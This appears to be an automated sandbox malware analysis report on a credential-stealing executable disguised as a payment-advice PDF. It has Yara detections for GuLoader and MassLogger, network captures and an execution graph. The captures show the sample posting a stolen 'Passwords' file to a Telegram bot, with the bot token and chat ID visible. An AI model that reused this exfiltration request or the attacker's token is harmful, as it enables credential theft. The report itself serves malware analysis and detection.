                                                                                                                                  2024-12-17 07:44:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 61 37 35 66 38 61 38 33 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd21a75f8a832eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:44:13 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:13 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:44:13 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13703,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421453,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.449918149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:44:16 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd223092f2d6dc
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:44:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 33 30 39 32 66 32 64 36 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd223092f2d6dcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:44:16 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:16 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:44:16 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13704,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421456,"document":{"file_n


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:42:11
                                                                                                                                  Start date:17/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:471'469 bytes
                                                                                                                                  MD5 hash:34DCD76E7A002A5F19D9842A70BA5C87
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2032752399.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2032752399.00000000034A1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:02:42:46
                                                                                                                                  Start date:17/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:471'469 bytes
                                                                                                                                  MD5 hash:34DCD76E7A002A5F19D9842A70BA5C87
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2933469686.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:21.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                    Signature Coverage:20.8%
                                                                                                                                    Total number of Nodes:1517
                                                                                                                                    Total number of Limit Nodes:47
                                                                                                                                    execution_graph 4802 10001000 4805 1000101b 4802->4805 4812 10001516 4805->4812 4807 10001020 4808 10001024 4807->4808 4809 10001027 GlobalAlloc 4807->4809 4810 1000153d 3 API calls 4808->4810 4809->4808 4811 10001019 4810->4811 4814 1000151c 4812->4814 4813 10001522 4813->4807 4814->4813 4815 1000152e GlobalFree 4814->4815 4815->4807 4816 402840 4817 402bbf 18 API calls 4816->4817 4819 40284e 4817->4819 4818 402864 4821 405c05 2 API calls 4818->4821 4819->4818 4820 402bbf 18 API calls 4819->4820 4820->4818 4822 40286a 4821->4822 4844 405c2a GetFileAttributesW CreateFileW 4822->4844 4824 402877 4825 402883 GlobalAlloc 4824->4825 4826 40291a 4824->4826 4829 402911 CloseHandle 4825->4829 4830 40289c 4825->4830 4827 402922 DeleteFileW 4826->4827 4828 402935 4826->4828 4827->4828 4829->4826 4845 403258 SetFilePointer 4830->4845 4832 4028a2 4833 403242 ReadFile 4832->4833 4834 4028ab GlobalAlloc 4833->4834 4835 4028bb 4834->4835 4836 4028ef 4834->4836 4837 403027 32 API calls 4835->4837 4838 405cdc WriteFile 4836->4838 4843 4028c8 4837->4843 4839 4028fb GlobalFree 4838->4839 4840 403027 32 API calls 4839->4840 4841 40290e 4840->4841 4841->4829 4842 4028e6 GlobalFree 4842->4836 4843->4842 4844->4824 4845->4832 4846 401cc0 4847 402ba2 18 API calls 4846->4847 4848 401cc7 4847->4848 4849 402ba2 18 API calls 4848->4849 4850 401ccf GetDlgItem 4849->4850 4851 402531 4850->4851 4852 4029c0 4853 402ba2 18 API calls 4852->4853 4854 4029c6 4853->4854 4855 4029f9 4854->4855 4857 40281e 4854->4857 4858 4029d4 4854->4858 4856 406077 18 API calls 4855->4856 4855->4857 4856->4857 4858->4857 4860 405f9c wsprintfW 4858->4860 4860->4857 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 100017d7 4351 100017cd 4336->4351 4429 10002b5f 4336->4429 4337 100017be 4341 100017c4 4337->4341 4345 100017cf 4337->4345 4338 1000180c 4342 10001812 4338->4342 4343 1000184e 4338->4343 4339 100017ee 4432 100024a9 4339->4432 4341->4351 4413 100028a4 4341->4413 4347 100015b4 3 API calls 4342->4347 4349 100024a9 10 API calls 4343->4349 4344 100017f4 4443 100015b4 4344->4443 4423 10002645 4345->4423 4353 10001828 4347->4353 4354 10001840 4349->4354 4351->4338 4351->4339 4357 100024a9 10 API calls 4353->4357 4358 10001895 4354->4358 4454 1000246c 4354->4454 4356 100017d5 4356->4351 4357->4354 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4336 4408->4337 4408->4351 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4351 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4436 100024b3 4434->4436 4435 10002541 lstrcpynW 4435->4436 4436->4434 4436->4435 4437 1000250b MultiByteToWideChar 4436->4437 4438 10002554 wsprintfW 4436->4438 4439 10002571 GlobalFree 4436->4439 4440 100025ac GlobalFree 4436->4440 4441 10001272 2 API calls 4436->4441 4480 100012e1 4436->4480 4437->4436 4438->4436 4439->4436 4440->4344 4441->4436 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4354 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4436 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4436 4483->4482 4484->4445 4861 4016c4 4862 402bbf 18 API calls 4861->4862 4863 4016ca GetFullPathNameW 4862->4863 4864 4016e4 4863->4864 4865 401706 4863->4865 4864->4865 4868 406398 2 API calls 4864->4868 4866 40171b GetShortPathNameW 4865->4866 4867 402a4c 4865->4867 4866->4867 4869 4016f6 4868->4869 4869->4865 4871 406055 lstrcpynW 4869->4871 4871->4865 4872 4014cb 4873 4051b4 25 API calls 4872->4873 4874 4014d2 4873->4874 4875 40194e 4876 402bbf 18 API calls 4875->4876 4877 401955 lstrlenW 4876->4877 4878 402531 4877->4878 4879 4027ce 4880 4027d6 4879->4880 4881 4027da FindNextFileW 4880->4881 4884 4027ec 4880->4884 4882 402833 4881->4882 4881->4884 4885 406055 lstrcpynW 4882->4885 4885->4884 4682 401754 4683 402bbf 18 API calls 4682->4683 4684 40175b 4683->4684 4685 405c59 2 API calls 4684->4685 4686 401762 4685->4686 4687 405c59 2 API calls 4686->4687 4687->4686 4886 401d56 GetDC GetDeviceCaps 4887 402ba2 18 API calls 4886->4887 4888 401d74 MulDiv ReleaseDC 4887->4888 4889 402ba2 18 API calls 4888->4889 4890 401d93 4889->4890 4891 406077 18 API calls 4890->4891 4892 401dcc CreateFontIndirectW 4891->4892 4893 402531 4892->4893 4894 401a57 4895 402ba2 18 API calls 4894->4895 4896 401a5d 4895->4896 4897 402ba2 18 API calls 4896->4897 4898 401a05 4897->4898 4899 4014d7 4900 402ba2 18 API calls 4899->4900 4901 4014dd Sleep 4900->4901 4903 402a4c 4901->4903 4904 40155b 4905 4029f2 4904->4905 4908 405f9c wsprintfW 4905->4908 4907 4029f7 4908->4907 4784 401ddc 4785 402ba2 18 API calls 4784->4785 4786 401de2 4785->4786 4787 402ba2 18 API calls 4786->4787 4788 401deb 4787->4788 4789 401df2 ShowWindow 4788->4789 4790 401dfd EnableWindow 4788->4790 4791 402a4c 4789->4791 4790->4791 4909 40385c 4910 403867 4909->4910 4911 40386b 4910->4911 4912 40386e GlobalAlloc 4910->4912 4912->4911 4913 4022df 4914 402bbf 18 API calls 4913->4914 4915 4022ee 4914->4915 4916 402bbf 18 API calls 4915->4916 4917 4022f7 4916->4917 4918 402bbf 18 API calls 4917->4918 4919 402301 GetPrivateProfileStringW 4918->4919 4920 401bdf 4921 402ba2 18 API calls 4920->4921 4922 401be6 4921->4922 4923 402ba2 18 API calls 4922->4923 4924 401bf0 4923->4924 4925 401c00 4924->4925 4926 402bbf 18 API calls 4924->4926 4927 401c10 4925->4927 4928 402bbf 18 API calls 4925->4928 4926->4925 4929 401c1b 4927->4929 4930 401c5f 4927->4930 4928->4927 4932 402ba2 18 API calls 4929->4932 4931 402bbf 18 API calls 4930->4931 4933 401c64 4931->4933 4934 401c20 4932->4934 4935 402bbf 18 API calls 4933->4935 4936 402ba2 18 API calls 4934->4936 4937 401c6d FindWindowExW 4935->4937 4938 401c29 4936->4938 4941 401c8f 4937->4941 4939 401c31 SendMessageTimeoutW 4938->4939 4940 401c4f SendMessageW 4938->4940 4939->4941 4940->4941 4942 401960 4943 402ba2 18 API calls 4942->4943 4944 401967 4943->4944 4945 402ba2 18 API calls 4944->4945 4946 401971 4945->4946 4947 402bbf 18 API calls 4946->4947 4948 40197a 4947->4948 4949 40198e lstrlenW 4948->4949 4950 4019ca 4948->4950 4951 401998 4949->4951 4951->4950 4955 406055 lstrcpynW 4951->4955 4953 4019b3 4953->4950 4954 4019c0 lstrlenW 4953->4954 4954->4950 4955->4953 4956 401662 4957 402bbf 18 API calls 4956->4957 4958 401668 4957->4958 4959 406398 2 API calls 4958->4959 4960 40166e 4959->4960 4961 4019e4 4962 402bbf 18 API calls 4961->4962 4963 4019eb 4962->4963 4964 402bbf 18 API calls 4963->4964 4965 4019f4 4964->4965 4966 4019fb lstrcmpiW 4965->4966 4967 401a0d lstrcmpW 4965->4967 4968 401a01 4966->4968 4967->4968 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4969 401e66 4970 402bbf 18 API calls 4969->4970 4971 401e6c 4970->4971 4972 4051b4 25 API calls 4971->4972 4973 401e76 4972->4973 4974 405735 2 API calls 4973->4974 4975 401e7c 4974->4975 4976 401edb CloseHandle 4975->4976 4977 401e8c WaitForSingleObject 4975->4977 4978 40281e 4975->4978 4976->4978 4979 401e9e 4977->4979 4980 401eb0 GetExitCodeProcess 4979->4980 4981 406467 2 API calls 4979->4981 4982 401ec2 4980->4982 4983 401ecd 4980->4983 4984 401ea5 WaitForSingleObject 4981->4984 4986 405f9c wsprintfW 4982->4986 4983->4976 4984->4979 4986->4983 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4987 404267 lstrlenW 4988 404286 4987->4988 4989 404288 